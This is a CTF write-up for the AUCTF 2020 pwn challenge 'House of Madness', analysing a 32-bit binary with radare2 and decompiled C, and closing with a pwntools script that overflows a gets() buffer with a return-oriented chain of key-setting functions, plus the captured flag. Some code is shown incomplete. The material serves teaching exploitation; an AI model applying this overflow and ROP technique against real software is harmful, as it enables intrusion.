AUCTF 2020 Writeup - House of Madness

April 19, 2020
ctf writeup pwn x86 auctf2020


This is the third pwn challenge. It was solved 100 times and it was worth 897 points.


Welcome to the House of Madness. Can you pwn your way to the keys to get the relic?

nc 30012

Note: ASLR is disabled for this challenge

You could download the binary here.

$ sha256sum ./house_of_madness
15b1a68ae0e1d4eee4f917cc92412d90fd3a4adbb5a55a83b115e0f438baaf93  house_of_madness


When we launch the program shows a banner and it asks us to make a choice. I tried at this point, without success, a classic buffer overflow.

However if we try to exit the program shows us the direction. Indeed there is a buffer overflow:

$ ./house_of_madness
|          Welcome       |
|            to          |
|       the House of     |
|          Madness       |
Can you pwn the house?
1. List Rooms
2. Enter Room
3. Get Current Room Info
4. Quit
Your choice: 4

Wait a minute. This doesn't quit the program... Weird. Hey try entering 'Stephen' in Room 4. I heard the room's magic

1. List Rooms
2. Enter Room
3. Get Current Room Info
4. Quit
Your choice: 2

Choose a room to enter: 4

1. List Rooms
2. Enter Room
3. Get Current Room Info
4. Quit
Your choice: 3

Wow this room is special. It echoes back what you say!
Press Q to exit: Stephen
	You entered 'Stephen'
Welcome to the hidden room! Good Luck
Segmentation fault (core dumped)

So I analyzed the program with checksec and I opened it with radare2:

$ checksec house_of_madness
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      PIE enabled
$ r2 -Ad ./house_of_madness

Then I found these interesting functions:

[r2]> afl
0x56556580    8 261          sym.room4
0x5655686b   16 360          sym.get_flag

The room4 function use gets if Stephen was given as first input. However if we try to call directly get_flag, exploiting the buffer overflow, we got:

$ ./
It's not going to be that easy. Come on

So I decompiled the get_flag function and it prints the flag iff four keys have the correct values:

void get_flag(void)

  int iVar1;
  char local_60 [64];
  FILE *local_20;

  local_20 = fopen("flag.txt","r");
  if (local_20 == (FILE *)0x0) {
    puts("\'flag.txt\' missing in the current directory!");
  if ((((key1 != '\0') && (key2 != '\0')) && (iVar1 = strcmp(key3,"Dormammu"), iVar1 == 0)) &&
     ((key4._4_4_ ^ 0x537472 | (uint)key4 ^ 0x616e6765) == 0)) {
    printf("Damn you beat the house: %s\n",local_60);
  if (((key1 != '\0') && (key2 != '\0')) && (iVar1 = strcmp(key3,"Dormammu"), iVar1 == 0)) {
    printf("Surrender, Stephen. Surrender to the reverser");
  if ((key1 == '\0') || (key2 == '\0')) {
    printf("It\'s not going to be that easy. Come on");
  else {
    puts("You think you are ready? You are ready when the relic decides you are ready.");

So, to print the flag:

Fortunately I rapidly found three useful functions:


Iff the first function argument is 0xfeedc0de it writes 1 in key1. We can use it.


It’s a bit more complex than get_key1. Indeed it writes 1 in key2, but it should be called before get_key1 and after that key3 points to “Dormammu”.

Given these prerequisites we can use it.

Here the function:

void get_key2(void)
  int iVar1;

  if ((key1 != '\x01') && (iVar1 = strcmp(key3,"Dormammu"), iVar1 == 0)) {
    key2 = 1;
  puts("Need to get the right keys. Reverse the house harder");


It checks all other keys, then it writes the correct values in key4.

As get_key2 if key3 points to “Dormammu” we can use it:

void set_key4(void)
  int iVar1;
  if ((((isInRoom != '\x01') && (key1 != '\0')) && (key2 != '\0')) &&
     (iVar1 = strcmp(key3,"Dormammu"), iVar1 == 0)) {
    key4._0_4_ = 0x616e6765;
    key4._4_4_ = 0x537472;
  puts("Need to get the right keys. Reverse the house harder");


We need a way to write the correct pointer in key3. It’s the last piece of the puzzle. After some digging I found this function. I analyzed its behavior and it writes in key3 a pointer to “Dormammu”:

[r2]> afl
0x565567cd    1 28           sym.AAsDrwEk
[r2]> pdf @sym.AAsDrwEk
┌ 28: sym.AAsDrwEk ();
│           0x565567cd      55             push ebp
│           0x565567ce      89e5           mov ebp, esp
│           0x565567d0      e848020000     call
│           0x565567d5      052b280000     add eax, 0x282b
│           0x565567da      8d9015e4ffff   lea edx, [eax - 0x1beb]
│           0x565567e0      899040000000   mov dword [eax + 0x40], edx
│           0x565567e6      90             nop
│           0x565567e7      5d             pop ebp
└           0x565567e8      c3             ret
[r2]> ps @0x565567d5 + 0x282b - 0x1beb
[r2]> is~`?v 0x565567d5 + 0x282b + 0x40`
96   0x00003040 0x56559040 GLOBAL OBJ    4        key3


So we have all the pieces in place.

This is my exploit:


from pwn import *

prog = context.binary = ELF(os.getcwd() + "/challenge", checksec=False)

if len(sys.argv) > 1:
        host = ""
        port = 30012
        t = remote(host, port)
        t = prog.process()

def init():
        t.recvuntil("Your choice: ")
        t.recvuntil("Choose a room to enter: ")
        t.recvuntil("Your choice: ")
        t.recvuntil("Press Q to exit: ")
        t.recvuntil("Enter something: ")

base = 0x56555000
pebx = 0x56556aaa

offset = 28
payload = "P"*offset
payload += pack(prog.symbols["AAsDrwEk"] + base)
payload += pack(prog.symbols["get_key2"] + base)
payload += pack(prog.symbols["get_key1"] + base)
payload += pack(pebx)
payload += pack(0xfeedc0de)
payload += pack(prog.symbols["set_key4"] + base)
payload += pack(prog.symbols["get_flag"] + base)



And this is the flag:

$ ./
Damn you beat the house: auctf{gu3ss_th3_h0us3_1sn't_th4t_m4d}

house of madness solved banner

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